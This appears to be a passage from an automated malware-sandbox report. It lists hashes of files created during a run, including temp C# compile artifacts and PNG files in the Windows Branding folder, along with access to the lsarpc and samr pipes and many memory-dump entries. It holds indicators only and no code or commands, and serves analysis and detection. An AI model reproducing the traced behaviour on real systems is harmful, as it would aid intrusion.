SHA256d1ecda791923ca0ae98bcff84c9d620c3bf3ac3fccf909dd3a6ea6597299ac07
SHA51236488253d7c4f90b5980a1865911b5f6ba5f5483c203c14218ecdd6a3399a704be26a98fc610fdd87e1967dd198cf71c05278304dcb3b4c9b43d9ee0c4632e71
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
06d56e9bd6a654afd44839be3ceec699
SHA1cfc820a21c101b0f54c807494bd73dc9efa95643
SHA256d1ecda791923ca0ae98bcff84c9d620c3bf3ac3fccf909dd3a6ea6597299ac07
SHA51236488253d7c4f90b5980a1865911b5f6ba5f5483c203c14218ecdd6a3399a704be26a98fc610fdd87e1967dd198cf71c05278304dcb3b4c9b43d9ee0c4632e71
-
C:\Windows\system32\rfxvmt.dllMD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\gne0it5f\CSC7D194C37303741B193EC4998D4B92816.TMPMD5
4d59beec10c936ee1a78b676bd7408ac
SHA1a4763348d0ed2a90844ad62e3511193356fb9238
SHA25637f15fba6f5c6b606f20285cea115e235ff5d768613449773a50db907fdad4a0
SHA51202a127a99b9b217671a68e3106a349f8523061ffa970885b5c5f3912bba8d924eb2f669e19772dbdbf223cf14fb20b06d4e597442d316155cfe0d87ebd99cb9c
-
\??\c:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.cmdlineMD5
9a845fff3e6129e3598729f0de2ad3b2
SHA1c37050d4bc452606fc9a47b99230d1efba53902f
SHA256670e12c8ceb91141d9cb2729f52f686879a667398ea5e7a338063dfbca9e6a9a
SHA5122ce2b1d5d48fbcfa0cda8442f732f75e2c80ea3506f114e4e5d5505f1e33849e40bceb3caf4ac6a01a8a681235719070824e9741f4e866d318c22b9a895bd18f
-
\Windows\Branding\mediasrv.pngMD5
590ae32e6e9072e2b0ad71650d787af9
SHA10ab159b2b34b3ebcfdef8e9857fcd09605bbb0c7
SHA25642d111d512d35fc3ae7a82399ee2cb9403836ddc676237c16a73cba14e7e72bc
SHA5122b89db1d9229c9baa3cee7700609004cb0313d85886b7652500ba0c6ddee3aa80c39ea6e39ad84f3dba4527e202cf639068d26d93a004a25e90e69d14766179b
-
\Windows\Branding\mediasvc.pngMD5
c4184e993992dc9b9bb7d2b536311f98
SHA1fa3a97ac00dbdc7db025d40edf8013cc74d2244f
SHA25681bd39baea5ba98b725f2362f09c41550bb768da73f174ef032e1a6b6318c6f6
SHA512d10f9f40da51ca5a71fa473d5521d103dfa55e681b72e789627b8406e3b7158a9621a6a233b1dab905823f4335c1aba27fd5d819f61179227b8ede17ba5f4c19
-
memory/240-191-0x0000000000000000-mapping.dmp
-
memory/240-183-0x0000000000000000-mapping.dmp
-
memory/332-194-0x0000000000000000-mapping.dmp
-
memory/332-168-0x0000000000000000-mapping.dmp
-
memory/436-184-0x0000000000000000-mapping.dmp
-
memory/572-75-0x0000000000000000-mapping.dmp
-
memory/652-176-0x0000000000000000-mapping.dmp
-
memory/672-174-0x0000000000000000-mapping.dmp
-
memory/672-196-0x0000000000000000-mapping.dmp
-
memory/788-59-0x0000000041490000-0x00000000418B1000-memory.dmpFilesize
4.1MB
-
memory/788-64-0x00000000283A7000-0x00000000283A8000-memory.dmpFilesize
4KB
-
memory/788-63-0x00000000283A6000-0x00000000283A7000-memory.dmpFilesize
4KB
-
memory/788-61-0x00000000283A2000-0x00000000283A4000-memory.dmpFilesize
8KB
-
memory/788-62-0x00000000283A4000-0x00000000283A6000-memory.dmpFilesize
8KB
-
memory/820-166-0x0000000000000000-mapping.dmp
-
memory/820-197-0x0000000000000000-mapping.dmp
-
memory/960-87-0x0000000000000000-mapping.dmp
-
memory/960-98-0x0000000001F60000-0x0000000001F61000-memory.dmpFilesize
4KB
-
memory/960-93-0x0000000002310000-0x0000000002311000-memory.dmpFilesize
4KB
-
memory/960-95-0x000000001B910000-0x000000001B911000-memory.dmpFilesize
4KB
-
memory/960-97-0x00000000026F0000-0x00000000026F1000-memory.dmpFilesize
4KB
-
memory/960-99-0x000000001AC20000-0x000000001AC22000-memory.dmpFilesize
8KB
-
memory/960-100-0x000000001AC24000-0x000000001AC26000-memory.dmpFilesize
8KB
-
memory/960-106-0x000000001B5B0000-0x000000001B5B1000-memory.dmpFilesize
4KB
-
memory/960-120-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/960-119-0x0000000002660000-0x0000000002661000-memory.dmpFilesize
4KB
-
memory/968-162-0x0000000000000000-mapping.dmp
-
memory/1108-164-0x0000000000000000-mapping.dmp
-
memory/1108-190-0x0000000000000000-mapping.dmp
-
memory/1160-170-0x0000000000000000-mapping.dmp
-
memory/1352-169-0x0000000000000000-mapping.dmp
-
memory/1396-69-0x00000000024C0000-0x00000000024C1000-memory.dmpFilesize
4KB
-
memory/1396-84-0x000000001B6F0000-0x000000001B6F1000-memory.dmpFilesize
4KB
-
memory/1396-74-0x000000001B560000-0x000000001B561000-memory.dmpFilesize
4KB
-
memory/1396-156-0x000000001C2C0000-0x000000001C2C1000-memory.dmpFilesize
4KB
-
memory/1396-66-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmpFilesize
8KB
-
memory/1396-71-0x00000000025D4000-0x00000000025D6000-memory.dmpFilesize
8KB
-
memory/1396-82-0x00000000025B0000-0x00000000025B1000-memory.dmpFilesize
4KB
-
memory/1396-72-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/1396-68-0x000000001AA00000-0x000000001AA01000-memory.dmpFilesize
4KB
-
memory/1396-65-0x0000000000000000-mapping.dmp
-
memory/1396-85-0x000000001B770000-0x000000001B771000-memory.dmpFilesize
4KB
-
memory/1396-70-0x00000000025D0000-0x00000000025D2000-memory.dmpFilesize
8KB
-
memory/1396-86-0x000000001B630000-0x000000001B631000-memory.dmpFilesize
4KB
-
memory/1396-67-0x0000000001F90000-0x0000000001F91000-memory.dmpFilesize
4KB
-
memory/1396-101-0x00000000025DA000-0x00000000025F9000-memory.dmpFilesize
124KB
-
memory/1448-161-0x0000000000000000-mapping.dmp
-
memory/1488-78-0x0000000000000000-mapping.dmp
-
memory/1488-163-0x0000000000000000-mapping.dmp
-
memory/1588-198-0x0000000000000000-mapping.dmp
-
memory/1588-209-0x0000000000000000-mapping.dmp
-
memory/1624-193-0x0000000000000000-mapping.dmp
-
memory/1624-199-0x0000000000000000-mapping.dmp
-
memory/1628-175-0x0000000000000000-mapping.dmp
-
memory/1652-206-0x00000000194D4000-0x00000000194D6000-memory.dmpFilesize
8KB
-
memory/1652-200-0x0000000000000000-mapping.dmp
-
memory/1652-185-0x0000000000000000-mapping.dmp
-
memory/1652-207-0x00000000194DA000-0x00000000194F9000-memory.dmpFilesize
124KB
-
memory/1652-205-0x00000000194D0000-0x00000000194D2000-memory.dmpFilesize
8KB
-
memory/1656-160-0x0000000000000000-mapping.dmp
-
memory/1716-165-0x0000000000000000-mapping.dmp
-
memory/1764-131-0x000000001B600000-0x000000001B601000-memory.dmpFilesize
4KB
-
memory/1764-167-0x0000000000000000-mapping.dmp
-
memory/1764-127-0x000000001AA84000-0x000000001AA86000-memory.dmpFilesize
8KB
-
memory/1764-121-0x0000000000000000-mapping.dmp
-
memory/1764-134-0x0000000002110000-0x0000000002111000-memory.dmpFilesize
4KB
-
memory/1764-133-0x000000001B690000-0x000000001B691000-memory.dmpFilesize
4KB
-
memory/1764-129-0x000000001B3B0000-0x000000001B3B1000-memory.dmpFilesize
4KB
-
memory/1764-126-0x000000001AA80000-0x000000001AA82000-memory.dmpFilesize
8KB
-
memory/1800-208-0x0000000000000000-mapping.dmp
-
memory/1800-177-0x0000000000000000-mapping.dmp
-
memory/1848-157-0x0000000000000000-mapping.dmp
-
memory/1848-178-0x0000000000000000-mapping.dmp
-
memory/1908-187-0x0000000000000000-mapping.dmp
-
memory/1912-179-0x0000000000000000-mapping.dmp
-
memory/1912-159-0x0000000000000000-mapping.dmp
-
memory/1920-172-0x0000000000000000-mapping.dmp
-
memory/1928-195-0x0000000000000000-mapping.dmp
-
memory/1928-155-0x000000001AAB4000-0x000000001AAB6000-memory.dmpFilesize
8KB
-
memory/1928-154-0x000000001AAB0000-0x000000001AAB2000-memory.dmpFilesize
8KB
-
memory/1928-142-0x0000000000000000-mapping.dmp
-
memory/1980-186-0x0000000000000000-mapping.dmp
-
memory/1980-173-0x0000000000000000-mapping.dmp
-
memory/1984-182-0x0000000000000000-mapping.dmp